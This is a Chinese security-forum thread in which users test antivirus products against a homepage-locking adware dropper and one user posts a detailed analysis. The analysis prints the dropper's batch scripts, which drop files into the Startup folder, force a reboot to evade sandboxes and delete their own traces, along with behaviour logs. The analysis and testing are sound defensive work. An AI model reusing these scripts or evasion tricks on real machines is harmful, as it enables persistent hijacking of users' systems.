楼主: F-Secure
收起左侧

[病毒样本] 大家测试一下,多引擎杀毒全过了,已更新

  [复制链接]
时喽啰
发表于 2015-10-10 18:44:50 | 显示全部楼层
前两天百度云莫名其妙被关注了一个人,发了好像有几百个这种包,当时大蜘蛛没反应,后来全盘扫描杀掉了一个启动菜单中的EXE,后来换了小红伞,还是没反应,后来Avast,双击之后立马重启,重启之前Avast报毒。。。。也不知道现在什么鬼情况
275751198
发表于 2015-10-10 21:26:41 | 显示全部楼层
挺有意思的,上报360
sanhu35
发表于 2015-10-10 21:34:40 | 显示全部楼层
火绒 MISs
坏脾气的男生
发表于 2015-10-10 22:34:24 | 显示全部楼层
过费尔扫描,未双击。
时不着调
发表于 2015-10-10 23:41:31 | 显示全部楼层
实机双击过迈克菲直接重启启动项多了2345
尘梦幽然
发表于 2015-10-12 17:14:56 | 显示全部楼层
本帖最后由 尘梦幽然 于 2015-10-12 21:39 编辑

[mw_shl_code=css,true]Developer Notes:
mm.bat is not malicious.
mm.exe is not malicious.
你要的东西.exe is not malicious.
解压密码.lnk is not malicious.
说明.lnk is not malicious.
LMIns.exe is a non-repairable threat.
This message was generated by Symantec Security Response automation.[/mw_shl_code]
翼风Fly
发表于 2015-10-12 20:46:13 | 显示全部楼层
本帖最后由 翼风Fly 于 2015-10-13 20:50 编辑

总结:这货就是个死锁主页的加驱流氓,未发现木马病毒特征。
理论无杀软的预防措施:开启UAC,遇到怀疑内容点一下否,然后这货就被灭活了。。。。
希望有UAC的虚拟机开机测试一下。。。。
你看,开UAC多么重要~

PS:刚刚发现一个亮瞎眼的地方,从软件里发现了网站:http://hl.laolaoma.com/
还在为您辛苦设置的浏览器主页在打开时居然变成了其它地址而烦脑吗?
一生锁页为您解决后顾之忧,并且免费使用!

原来这货是以合法身份开发的加驱锁主页工具
详见64楼
http://bbs.kafan.cn/forum.php?mo ... 856719&pid=36057418


内容解析

接下来开始人工分析,菜菜一枚,各位轻拍~

下载后样本的直接分析
你要的东西.exe

OD里简单看了一下,这货就是个启动器,调用了几个系统文件,没看到什么特殊的地方(当然,看的比较草,水平也不够)

这东西用来干啥的?难道就是用来启动?

再看看里面批处理吧(我写了点注释)
[mw_shl_code=shell,true]::获取 当前用户的 运行 文件夹
for /f "skip=1 tokens=2*" %%a in ('reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup') do set qd=%%b
set qd=%qd:~0,-1%
::解压文件
mm.exe x -y -p  mm.rar ^"%qd%\^"
::关机重启
Shutdown.exe -r -f -t 0[/mw_shl_code]

快捷方式里的 cmd /c 是为了让你尽可能不会觉察有个批处理在运行

mm.exe其实就是WinRAR 5.21的命令版本,压缩包里一个是LMIns.exe(病毒主体),一个是2345.url (链接到 http://www.2345.com/?kisder
RAR参数:
x             以完整路径提取文件
y             对所有询问假定选择“是”
p[password]   设置密码

RAR将内容解压到启动文件夹中
密码是一个空格 ,而且竟然还TMD竟然是不常见的全角空格“ ”,对于不熟悉RAR命令行的人来说容易被迷惑;
真仔细。。。醉了。。。

竟然想到了关机啊这个比较绕的办法。。。。。不关机怎么过你的在线/沙箱?
这样的样本杀软能扫到就怪了,病毒被加密了,其他的都是白。


病毒主体:LMIns.exe  
本楼层为技术分析,之后请看64楼 http://bbs.kafan.cn/forum.php?mo ... 856719&pid=36057418
PEiD检测:Microsoft Visual Studio .NET 2005 -- 2008 -> Microsoft Corporation [Overlay] *
连壳都不加。原来这是个压缩包,释放5个文件。



(原文件已经由28楼提供下载)
先上在线行为:
【文件B超】https://b-chao.com/index.php/Ind ... 55106FDA7B8ADB85B2/
【哈勃】http://habo.qq.com/file/showdetail?pk=ADwGZ11tB2EIOA==
【火眼】我等的花都谢了。。。 报告还没生出来,先贴坑:http://fireeye.ijinshan.com/anal ... 43ce6a343d27f199a8d
【VirusScan】昨天有人扫了,3个报毒;现在,还是仨;跟进厂商们的速度不给力?
http://www.virscan.org/scan/72208c7a2a96fb3fa168579d3b6077ef

【VirusTotal】还是这里的厂商更新给力(检出率 10 / 56 ):https://www.virustotal.com/en/fi ... nalysis/1444661993/




batfile~.bat
这文件负责运行hlsys32.exe后删除痕迹。
[mw_shl_code=shell,true]"C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
:again
del "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /Q  
if exist "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" goto again
del C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\*.*  /Q  
del %0
[/mw_shl_code]

hlsys32.exe  (需要UAC权限)
LaoMa Software ——老马软件?挺形象,哈哈~这东西用来负责下面的文件运行。也就是说,如果这货起不来,下面的都作废。OD简单看了一下,各种系统调用。不过为啥颠来倒去就那几个文件。。。小白不懂。。。

hlsys64.exe
又是LaoMa Software,用来负责64位系统

lksys.ini
一生锁页。。。这个名字带感!各种浏览器不惧,管他是不是XXX安全浏览器~
[Config]
title=一生锁页
browsers_referer=chrome.exe*ucbrowser.exe*iexplore.exe*firefox.exe*360chrome.exe*360se.exe*liebao.exe*maxthon.exe*qqbrowser.exe*baidubrowser.exe*sogouexplorer.exe*opera.exe*f1browser.exe*2345Explorer.exe*2345chrome.exe*Opera\launcher.exe
url=http://www.2345.com/?kisder
param_deny=
param_reg_deny=
pmode=0
browsers=
saveurl=0
netcfgurl=
notclear=
pmode1=0
param_deny1=
param_reg_deny1=
lockmode=0
id=0
restart=0
secsnotlock=0

hlsys.dat
没仔细看,应该是个驱动



再往下我就不分析了。。。。


没想到我这个菜菜竟然分析出来了


行为日志

2015-10-12 20:38:18        c:\windows\explorer.exe        创建新进程        c:\documents and settings\【用户名】\桌面\1\f-secure\你要的东西.exe        允许        [应用程序]*        命令行: "C:\Documents and Settings\【用户名】\桌面\1\f-secure\你要的东西.exe"
2015-10-12 20:38:19        c:\documents and settings\【用户名】\桌面\1\f-secure\你要的东西.exe        创建新进程        c:\windows\explorer.exe        允许        [应用程序]*        命令行: explorer.exe /e,/select,mm\说明.lnk
2015-10-12 20:38:29        c:\windows\explorer.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /C "@echo off & mm.bat"
2015-10-12 20:38:38        c:\windows\system32\cmd.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
2015-10-12 20:38:42        c:\windows\system32\cmd.exe        创建新进程        c:\windows\system32\reg.exe        允许        [应用程序]*        命令行: reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
2015-10-12 20:38:46        c:\windows\system32\cmd.exe        创建新进程        c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe        允许        [应用程序]*        命令行: mm.exe x -y -p  mm.rar "C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\"
2015-10-12 20:38:54        c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe        修改文件        C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\LMIns.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2015-10-12 20:38:57        c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe        修改文件        C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\2345.url        允许               
2015-10-12 20:39:01        c:\windows\system32\cmd.exe        创建新进程        c:\windows\system32\shutdown.exe        阻止        [应用程序]*        命令行: Shutdown.exe -r -f -t 0

果然没什么东西,纯粹靠批处理释放病毒体。用来开机运行的LMIns.exe:

2015-10-12 20:40:40        c:\documents and settings\【用户名】\桌面\lmins.exe        创建文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys32.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2015-10-12 20:40:42        c:\documents and settings\【用户名】\桌面\lmins.exe        创建文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys64.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2015-10-12 20:40:51        c:\documents and settings\【用户名】\桌面\lmins.exe        创建文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\batfile~.bat        允许        [文件组]所有执行文件 -> [文件]*; *.bat        
2015-10-12 20:40:59        c:\documents and settings\【用户名】\桌面\lmins.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: cmd /c ""C:\DOCUME~1\【用户名】\LOCALS~1\Temp\batfile~.bat" "
2015-10-12 20:41:05        c:\windows\system32\cmd.exe        创建新进程        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        允许        [应用程序]*        命令行: "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
2015-10-12 20:41:10        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        创建文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\~tmp_hl\mslmedia.sys        允许        [文件组]所有执行文件 -> [文件]*; *.sys        
2015-10-12 20:41:15        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        创建文件        C:\WINDOWS\system32\DRIVERS\Mslmedia.sys        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.sys        
2015-10-12 20:41:17        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        安装驱动程序或服务        system32\DRIVERS\Mslmedia.sys        允许        [应用程序]*        
2015-10-12 20:41:25        c:\windows\system32\services.exe        创建注册表项        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Winsock; HelperDllName        
2015-10-12 20:41:28        c:\windows\system32\services.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia\Start        允许                值: 0x00000001(1)
2015-10-12 20:41:32        c:\windows\system32\services.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia\ImagePath        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\*        值: system32\DRIVERS\Mslmedia.sys
2015-10-12 20:41:37        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GroupOrderList\FSFilter Activity Monitor        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GroupOrderList        值: 04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00
2015-10-12 20:41:39        c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe        删除文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\~tmp_hl\mslmedia.sys        允许        [文件组]所有执行文件 -> [文件]*; *.sys        
2015-10-12 20:41:51        c:\windows\system32\services.exe        加载驱动程序        c:\windows\system32\drivers\mslmedia.sys        允许        [应用程序]c:\windows\system32\services.exe        
2015-10-12 20:41:53        c:\windows\system32\cmd.exe        删除文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys32.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2015-10-12 20:41:55        c:\windows\system32\cmd.exe        删除文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys64.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2015-10-12 20:41:57        c:\windows\system32\cmd.exe        删除文件        C:\Documents and Settings\【用户名】\Local Settings\Temp\batfile~.bat        允许        [文件组]所有执行文件 -> [文件]*; *.bat        

笑了。。。

刚想重置虚拟机,又有动作:
2015-10-12 20:43:37        c:\windows\system32\svchost.exe        从其他进程复制句柄 (2)        c:\windows\explorer.exe        允许        [应用程序]c:\windows\system32\svchost.exe        句柄: (File) \Device\Afd\Endpoint
2015-10-12 20:43:42        c:\windows\explorer.exe        访问网络        UDP [本机 : 1051] ->  [120.25.144.64 : 31382]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2015-10-12 20:43:45        c:\windows\explorer.exe        访问网络        UDP [本机 : 1051] ->  [120.25.144.64 : 31381]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2015-10-12 20:44:06        c:\windows\explorer.exe        访问网络        UDP [本机 : 1051] ->  [120.25.144.64 : 31379]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2015-10-12 20:44:12        c:\windows\explorer.exe        访问网络        UDP [本机 : 1051] ->  [120.25.144.64 : 31380]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2015-10-12 20:44:19        c:\windows\explorer.exe        访问网络        TCP [本机 : 1052] ->  [120.25.112.8 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        下面的内容可能是因为我长时间不动,自动执行碎片整理的计划:
2015-10-12 20:47:35        c:\windows\system32\services.exe        向其他进程发送消息        c:\windows\system32\csrss.exe        允许        [应用程序]c:\windows\system32\services.exe        消息: WM_DEVICECHANGE
2015-10-12 21:25:53        c:\windows\system32\winlogon.exe        创建新进程        c:\windows\system32\logon.scr        允许        [应用程序]*        命令行: C:\WINDOWS\System32\logon.scr /s
2015-10-12 21:25:53        c:\windows\system32\svchost.exe        创建新进程        c:\windows\system32\defrag.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\defrag.exe" -p 438 -s 00000B14 -b C:
2015-10-12 21:25:54        c:\windows\system32\winlogon.exe        修改其他进程        c:\windows\system32\logon.scr        允许        [应用程序]c:\windows\system32\winlogon.exe        
2015-10-12 21:26:00        c:\windows\system32\defrag.exe        创建文件        C:\DFR8.tmp        允许        [文件]?:\        
2015-10-12 21:26:00        c:\windows\system32\defrag.exe        删除文件        C:\DFR8.tmp        允许        [文件]?:\        
2015-10-12 21:26:01        c:\windows\system32\defrag.exe        从其他进程复制句柄        c:\windows\system32\svchost.exe        允许        [应用程序]*        句柄: (Event) 0x00000B14
2015-10-12 21:26:01        c:\windows\system32\svchost.exe        创建新进程        c:\windows\system32\dfrgntfs.exe        允许        [应用程序]*        命令行: DfrgNtfs.exe -Embedding
2015-10-12 21:26:04        c:\windows\system32\dfrgntfs.exe        底层磁盘读操作 (2)        \Device\HarddiskVolume1        允许        [应用程序]*        

动作频频嘛。。。。估计这个在线沙箱就不太容易发现了,看来需要等等。。。

以上,分析完毕。



双击测试

本来想测多个杀软的,不过就测一个吧,国内用的最多的

360卫士:版本及防御信息:



默认配置

第一次双击:



单击关闭 x ,启动项被阻断,灭活。但重启

第二次双击:

为什么这次不拦了?成功加入启动项:


篡改成功:



体检一下:

就是个优化,完事了?
虽然接下来有体检的进一步提示,但是明显这种交互有漏洞啊


交互漏洞不管了,手动打开扫描:


不出意外的自动上传样本
但是我不明白这是触发了什么逻辑,会让360全盘来一遍?


核心部分被干掉了,系统恢复正常


===============    启示    ===============


  • 杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;
  • 如果这个毒一上来就用OD等反汇编来看,可能会很累,多次释放文件。
  • 沙箱竟然可以利用关机破解;不过测试360的沙箱没有关机行为;
  • 所以还是虚拟机跑一边比较省事保险。。。。当然遇到反虚拟机的除外


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 6经验 +5 人气 +5 收起 理由
绯色鎏金 + 5 感谢支持,欢迎常来: )
qftest + 1 版区有你更性感: )
275751198 + 1 感谢支持,欢迎常来: )
villana + 1 很给力!
尘梦幽然 + 1 已处理

查看全部评分

尘梦幽然
发表于 2015-10-12 21:38:32 | 显示全部楼层
@MXCERILYF!
提取出了mm.rar中的LMIns.exe

然后进行了分析。
[mw_shl_code=css,true]Developer Notes:
mm.bat is not malicious.
mm.exe is not malicious.
你要的东西.exe is not malicious.
解压密码.lnk is not malicious.
说明.lnk is not malicious.
LMIns.exe is a non-repairable threat.
This message was generated by Symantec Security Response automation.[/mw_shl_code]

[mw_shl_code=css,true]Assessment
File1:        LMIns.exe
MD5:        0xE4EC639C04CB743CE6A343D27F199A8D
SHA-1:        0x962A260CFAF53CB20CB3FC55106FDA7B8ADB85B2
Machine:        Machine
Determination:        NewThreat
Submission Detail:        This file is detected as Infostealer.Dyre with our existing Rapid Release definition set. Protection is available in Rapid Release definitions with a sequence number of 168624 or greater.
Signature Protection Name:        Infostealer.Dyre
Rapid Release Sequence Number:        168624
This message was generated by Symantec Security Response automation.[/mw_shl_code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
230f4
发表于 2015-10-12 21:44:31 | 显示全部楼层
本帖最后由 230f4 于 2015-10-13 12:50 编辑

28楼样本

2015-10-12:360报毒
Bitdefender明天报毒

2015-10-13:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
sunnyjianna
发表于 2015-10-12 22:01:49 | 显示全部楼层
红伞无感觉
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-16 22:55 , Processed in 0.098010 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表